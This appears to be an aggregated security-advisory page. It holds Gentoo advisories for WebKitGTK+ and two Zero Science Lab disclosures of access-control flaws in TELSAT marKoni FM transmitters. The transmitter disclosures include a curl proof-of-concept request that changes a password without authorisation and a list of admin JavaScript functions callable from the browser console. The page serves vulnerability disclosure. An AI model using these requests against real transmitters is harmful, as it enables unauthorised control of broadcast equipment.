CVE-2023-6510      https://nvd.nist.gov/vuln/detail/CVE-2023-6510[ 129 ] CVE-2023-6511      https://nvd.nist.gov/vuln/detail/CVE-2023-6511[ 130 ] CVE-2023-6512      https://nvd.nist.gov/vuln/detail/CVE-2023-6512[ 131 ] CVE-2023-6702      https://nvd.nist.gov/vuln/detail/CVE-2023-6702[ 132 ] CVE-2023-6703      https://nvd.nist.gov/vuln/detail/CVE-2023-6703[ 133 ] CVE-2023-6704      https://nvd.nist.gov/vuln/detail/CVE-2023-6704[ 134 ] CVE-2023-6705      https://nvd.nist.gov/vuln/detail/CVE-2023-6705[ 135 ] CVE-2023-6706      https://nvd.nist.gov/vuln/detail/CVE-2023-6706[ 136 ] CVE-2023-6707      https://nvd.nist.gov/vuln/detail/CVE-2023-6707[ 137 ] CVE-2023-7024      https://nvd.nist.gov/vuln/detail/CVE-2023-7024[ 138 ] CVE-2024-0222      https://nvd.nist.gov/vuln/detail/CVE-2024-0222[ 139 ] CVE-2024-0223      https://nvd.nist.gov/vuln/detail/CVE-2024-0223[ 140 ] CVE-2024-0224      https://nvd.nist.gov/vuln/detail/CVE-2024-0224[ 141 ] CVE-2024-0225      https://nvd.nist.gov/vuln/detail/CVE-2024-0225Availability============This GLSA and any updates to it are available for viewing atthe Gentoo Security Website: https://security.gentoo.org/glsa/202401-34Concerns?=========Security is a primary focus of Gentoo Linux and ensuring theconfidentiality and security of our users' machines is of utmostimportance to us. Any security concerns should be addressed tosecurity@gentoo.org or alternatively, you may file a bug athttps://bugs.gentoo.org.License=======Copyright 2024 Gentoo Foundation, Inc; referenced textbelongs to its owner(s).The contents of this document are licensed under theCreative Commons - Attribution / Share Alike license.https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-34

Gentoo Linux Security Advisory 202401-33 - Multiple vulnerabilities have been found in WebKitGTK+, the worst of which may lead to remote code execution. Versions greater than or equal to 2.42.2:4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-33  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: WebKitGTK+: Multiple Vulnerabilities  
     Date: January 31, 2024  
     Bugs: #915222, #918667  
       ID: 202401-33

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in WebKitGTK+, the worst of  
which may lead to remote code execution.

Background  
==========

WebKitGTK+ is a full-featured port of the WebKit rendering engine,  
suitable for projects requiring any kind of web integration, from hybrid  
HTML/CSS applications to full-fledged web browsers.

Affected packages  
=================

Package              Vulnerable    Unaffected  
-------------------  ------------  -------------  
net-libs/webkit-gtk  < 2.42.2:4    >= 2.42.2:4  
                     < 2.42.2:4.1  >= 2.42.2:4.1  
                     < 2.42.2:6    >= 2.42.2:6

Description  
===========

Multiple vulnerabilities have been discovered in WebKitGTK+. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All WebKitGTK+ users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.42.2"

References  
==========

[ 1 ] CVE-2023-32359  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32359  
[ 2 ] CVE-2023-35074  
      https://nvd.nist.gov/vuln/detail/CVE-2023-35074  
[ 3 ] CVE-2023-39434  
      https://nvd.nist.gov/vuln/detail/CVE-2023-39434  
[ 4 ] CVE-2023-39928  
      https://nvd.nist.gov/vuln/detail/CVE-2023-39928  
[ 5 ] CVE-2023-40451  
      https://nvd.nist.gov/vuln/detail/CVE-2023-40451  
[ 6 ] CVE-2023-41074  
      https://nvd.nist.gov/vuln/detail/CVE-2023-41074  
[ 7 ] CVE-2023-41983  
      https://nvd.nist.gov/vuln/detail/CVE-2023-41983  
[ 8 ] CVE-2023-41993  
      https://nvd.nist.gov/vuln/detail/CVE-2023-41993  
[ 9 ] CVE-2023-42852  
      https://nvd.nist.gov/vuln/detail/CVE-2023-42852  
[ 10 ] CVE-2023-42890  
      https://nvd.nist.gov/vuln/detail/CVE-2023-42890  
[ 11 ] WSA-2023-0009  
      https://webkitgtk.org/security/WSA-2023-0009.html

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-33

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-33

TELSAT marKoni FM Transmitter version 1.9.5 allows an unauthorized user to change passwords.

TELSAT marKoni FM Transmitter 1.9.5 Insecure Access Control Change Password

Vendor: TELSAT Srl  
Product web page: https://www.markoni.it  
Affected version: Markoni-D (Compact) FM Transmitters  
                  Markoni-DH (Exciter+Amplifiers) FM Transmitters  
                  Markoni-A (Analogue Modulator) FM Transmitters  
                  Firmware: 1.9.5  
                            1.9.3  
                            1.5.9  
                            1.4.6  
                            1.3.9

Summary: Professional FM transmitters.

Desc: Unauthorized user could exploit this vulnerability to change  
his/her password, potentially gaining unauthorized access to sensitive  
information or performing actions beyond her/his designated permissions.

Tested on: GNU/Linux 3.10.53 (armv7l)  
           icorem6solox  
           lighttpd/1.4.33

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Macedonian Information Security Research and Development Laboratory  
Zero Science Lab - https://www.zeroscience.mk - @zeroscience

Advisory ID: ZSL-2024-5811  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5811.php

10.11.2023

--

PoC request of a user changing his own password.  
Only admin can edit users. No permissions or Cookie check.

$ curl -s -H "Cookie: name=user-1702119917" \  
http://10.0.8.3:88/cgi-bin/ekafcgi.fcgi?OpCode=4&username=user&password=user&newpassword=t00tw00t

HTTP/1.1 200 OK  
Content-type: text/html  
Cache-control: no-cache  
Set-Cookie: name=user-1702119917; max-age=315360000  
Transfer-Encoding: chunked  
Date: Sat, 9 Dec 2023 11:05:17 GMT  
Server: lighttpd/1.4.33

oc=4&resp=0

TELSAT marKoni FM Transmitter 1.9.5 Insecure Access Control

TELSAT marKoni FM Transmitter version 1.9.5 implements client-side restrictions that can be bypassed by editing the HTML source page that enable administrative operations.

  
TELSAT marKoni FM Transmitter 1.9.5 Client-Side Access Control Bypass

Vendor: TELSAT Srl  
Product web page: https://www.markoni.it  
Affected version: Markoni-D (Compact) FM Transmitters  
                  Markoni-DH (Exciter+Amplifiers) FM Transmitters  
                  Markoni-A (Analogue Modulator) FM Transmitters  
                  Firmware: 1.9.5  
                            1.9.3  
                            1.5.9  
                            1.4.6  
                            1.3.9

Summary: Professional FM transmitters.

Desc: The application implements client-side restrictions that can  
be bypassed by editing the HTML source page that enable administrative  
operations.

Tested on: GNU/Linux 3.10.53 (armv7l)  
           icorem6solox  
           lighttpd/1.4.33

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Macedonian Information Security Research and Development Laboratory  
Zero Science Lab - https://www.zeroscience.mk - @zeroscience

Advisory ID: ZSL-2024-5810  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5810.php

10.11.2023

--

These few JavaScript functions can be called directly in the browser's console  
and can enable a user to execute and apply modifications with admin rights.  
There are plenty more functions throughout the web application's interface.

set_wget()  
change_ip_settings()  
change_web_port()  
set_sendtime()  
add_mailaddress()  
set_mailinglist()  
...  
...

Source

Packet Storm